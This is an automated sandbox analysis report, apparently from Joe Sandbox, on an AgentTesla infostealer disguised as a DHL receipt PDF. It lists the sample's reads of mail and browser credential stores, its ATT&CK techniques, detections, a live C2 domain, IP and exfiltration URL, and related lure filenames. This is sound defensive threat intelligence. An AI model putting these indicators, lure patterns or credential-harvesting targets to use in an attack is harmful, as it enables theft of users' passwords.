                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.39a2278.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.396ca58.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.39a2278.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.396ca58.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.306831919.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.307479462.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.564785123.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.567348132.0000000002960000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 4532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 6736, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 6736, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.39a2278.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.396ca58.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.39a2278.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.396ca58.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.306831919.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.307479462.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.564785123.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.567348132.0000000002960000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 4532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 6736, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12Masquerading1OS Credential Dumping1Security Software Discovery211Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Local System1Automated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.DHL_119040 ontvangstbewijs,pdf.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.DHL_119040 ontvangstbewijs,pdf.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      mgbless.in5%VirustotalBrowse
                      www.mgbless.in8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.mgbless.in8%VirustotalBrowse
                      http://www.mgbless.in0%Avira URL Cloudsafe
                      https://www.mgbless.in/0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.mgbless.in40%Avira URL Cloudsafe
                      https://www.mgbless.in0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://lmeJrA.com0%Avira URL Cloudsafe
                      http://mgbless.in0%Avira URL Cloudsafe
                      https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php127.0.0.1POST0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php0%Avira URL Cloudsafe
                      https://www.mgbless.inD80%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mgbless.in
                      104.223.93.105
                      truetrueunknown
                      www.mgbless.in
                      unknown
                      unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.phptrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.mgbless.inDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567156721.00000000028D9000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmptrue
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in/DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000003.346874952.0000000000C23000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.mgbless.in4DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.inDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%GETMozilla/5.0DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      low
                      http://lmeJrA.comDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://mgbless.inDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567156721.00000000028D9000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567106742.00000000028BC000.00000004.00000001.sdmpfalse
                        high
                        https://www.mgbless.in/mac/inc/0bb73b6c7ade1a.php127.0.0.1POSTDHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.org%DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567237496.00000000028F9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipDHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.mgbless.inD8DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567483642.00000000029AF000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.567260931.0000000002902000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        104.223.93.105
                        mgbless.inUnited States
                        8100ASN-QUADRANET-GLOBALUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528504
                        Start date:25.11.2021
                        Start time:11:36:15
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:DHL_119040 ontvangstbewijs,pdf.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:22
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/1@6/2
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        11:37:18API Interceptor737x Sleep call for process: DHL_119040 ontvangstbewijs,pdf.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        104.223.93.105Trasferimento.vbsGet hashmaliciousBrowse
                        • nofearsw.in/cgi-sys/suspendedpage.cgi
                        EL1aBD5Zqr.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        TnUFqujldH.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        20210711494754.vbsGet hashmaliciousBrowse
                        • nofearsw.in/fen/inc/9fa099d0b6dea5.php
                        msg001.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Chuyen giao,pdf.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Dekont.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        3Bws6ne7Ye.exeGet hashmaliciousBrowse
                        • jlpack.email/file/Panel/five/fre.php
                        filDHjBKef.exeGet hashmaliciousBrowse
                        • jlpack.email/grace/Panel/five/fre.php

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ASN-QUADRANET-GLOBALUSWaldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        Bestellung -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        K7hNSg5hRL.exeGet hashmaliciousBrowse
                        • 185.121.152.212
                        jwviEiXH9lGet hashmaliciousBrowse
                        • 45.199.228.229
                        6PZ6S2YGPBGet hashmaliciousBrowse
                        • 45.199.228.221
                        DHLEXpress is sending Pre-Alert1.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Shipment_21HT42223.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Nueva orden de compra,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        1E2503A0E84D330CB00DC6C883A889856DD3F4D849295.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Orden de Compra -SA95680.pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 #U0930#U0938#U0940#U0926 #U0926#U0938#U094d#U0924#U093e#U0935#U0947#U091c,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL Receipt Document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_1190323 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Orden de Compra -SA95647, pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Beckhoff Inkooporder -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Tax payment invoice - Monday, November 22, 2021,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eORDER #63457-BLS.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        TmVqivwYxc.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        g3g1VECs9K.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        SecuriteInfo.com.ArtemisEC35A67F3663.5978.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Purchase Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        PROPOSAL CATALOG.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        LNdP6FAphu.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Zkb2VENJ38.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        ORDER 759325.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        pH7pQDWJPP.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        oZPv3ngzrx.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        a.dllGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        qG92QcOmb4.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        CheatValorant2.2.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        New Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        gm8n7Rb1Jm.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Notificacion Juristas Y Asociados S A..exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_119040 ontvangstbewijs,pdf.exe.log
                        Process:C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:low
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.4917987511696795
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:DHL_119040 ontvangstbewijs,pdf.exe
                        File size:687616
                        MD5:a9b63c434e205092b3373e35c051a04a
                        SHA1:1b8d4e51f63e23b881159d168b5c0e70012c7e6c
